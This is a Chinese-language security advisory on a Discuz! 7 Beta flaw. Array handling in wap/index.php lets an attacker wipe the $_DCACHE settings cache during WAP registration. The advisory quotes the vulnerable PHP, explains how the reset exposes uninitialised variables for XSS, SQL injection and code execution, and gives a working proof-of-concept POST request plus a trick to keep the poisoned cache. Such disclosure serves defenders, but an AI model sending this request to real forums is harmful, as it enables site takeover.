author: ryat_at_[url]www.wolvez.org[/url]
team:[url]http://www.80vul.com[/url]

由于Discuz! 的wap\index.php调用Chinese类里Convert方法在处理post数据时不当忽视对数组的处理,可使数组被覆盖为NULL.当覆盖$_DCACHE时导致导致xss sql注射 代码执行等众多严重的安全问题.

一 分析

/wap/index.php

//43行
$chs = '';
if($_POST && $charset != 'utf-8') {
    $chs = new Chinese('UTF-8', $charset);
    foreach($_POST as $key => $value) {
        $$key = addslashes(stripslashes($chs->Convert($$key)));
    }
    unset($chs);
}
...
if(in_array($action, array('home', 'login', 'register', 'search', 'stats', 'my', 'myphone', 'goto', 'forum', 'thread', 'post'))) {
    require_once './include/'.$action.'.inc.php';

这个地方是对非utf-8编码下的数据进行编码转换,但Convert方法有一个问题,如果存在iconv()将会用此函数进行编码转换,这时如果传递进来的参数是一个数组,将会返回FALSE,那么POST提交一个_DCACHE=1,经过Convert()处理$_DCACHE就会被覆盖为NULL[再经过stripslashes()或者addslashes()处理会被覆盖为一个空的字符串]:)

/wap/include/register.inc.php

//124行
    require_once DISCUZ_ROOT.'./include/cache.func.php';
    $_DCACHE['settings']['totalmembers']++;
    $_DCACHE['settings']['lastmember'] = $discuz_userss;
    updatesettings();
   
这个地方是注册用户后更新缓存数据,再来看看updatesettings()是怎么处理的:

include/cache.func.php

//252行
function updatesettings() {
    global $_DCACHE;
    if(isset($_DCACHE['settings']) && is_array($_DCACHE['settings'])) {
        writetocache('settings', '', '$_DCACHE[\'settings\'] = '.arrayeval($_DCACHE['settings']).";\n\n");
    }
}

可以看到这个地方写入的是$GLOBALS[_DCACHE],我们可以在注册时用上面提到的方法把$_DCACHE覆盖为一个空字符串,然后经过上面代码的重新赋值及更新缓存,最后写入forumdata/cache/cache_settings.php的将仅仅只有$_DCACHE['settings']['totalmembers']和$_DCACHE['settings']['lastmember']:)

include/common.inc.php

//95行:
$cachelost = (@include DISCUZ_ROOT.'./forumdata/cache/cache_settings.php') ? '' : 'settings';
@extract($_DCACHE['settings']);
...
$styleid = intval(!empty($_GET['styleid']) ? $_GET['styleid'] :
        (!empty($_POST['styleid']) ? $_POST['styleid'] :
        (!empty($_DSESSION['styleid']) ? $_DSESSION['styleid'] :
        $_DCACHE['settings']['styleid'])));

$styleid = intval(isset($stylejump[$styleid]) ? $styleid : $_DCACHE['settings']['styleid']);

if(@!include DISCUZ_ROOT.'./forumdata/cache/style_'.intval(!empty($forum['styleid']) ? $forum['styleid'] : $styleid).'.php') {
    $cachelost .= (@include DISCUZ_ROOT.'./forumdata/cache/style_'.($styleid = $_DCACHE['settings']['styleid']).'.php') ? '' : ' style_'.$styleid;
}

这里用extract处理了$_DCACHE['settings'],但由于此时包含的forumdata/cache/cache_settings.php文件中仅仅存在$_DCACHE['settings']['totalmembers']和$_DCACHE['settings']['lastmember'],将导致大量的变量没有初始化,而此部分变量在整个程序中起到了重要作用,但现在我们可以随意提交这些变量,这将导致xss,sql注射,命令执行等众多严重的安全问题:)

另外要注意$styleid可能会导致重新更新缓存文件,可以提交stylejump[1]=1&styleid=1&inajax=1,这样就不会再次更新缓存,forumdata/cache/cache_settings.php里依然是我们wap注册时写入的数据:)

PS:WAP用户注册默认并不开启

二 利用

Poc:

POST [url]http://127.0.0.1/dz/wap/index.php?action=register[/url] HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: [url]http://127.0.0.1/dz/wap/index.php[/url]
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1
Host: 127.0.0.1
Connection: close
Content-Length: 66

username=ryat&password=123456&email=ryat@ryat.com&_DCACHE=1

D:\>type Discuz_7_Beta_SC_GBK\upload\forumdata\cache\cache_settings.php
<?php
//Discuz! cache file, DO NOT modify me!
//Created: Nov 6, 2008, 22:27
//Identify: 1b0cb6a8551131fb818dc6fe54e9cad0

$_DCACHE['settings'] = array (
  'totalmembers' => 1,
  'lastmember' => 'ryat',
);

?>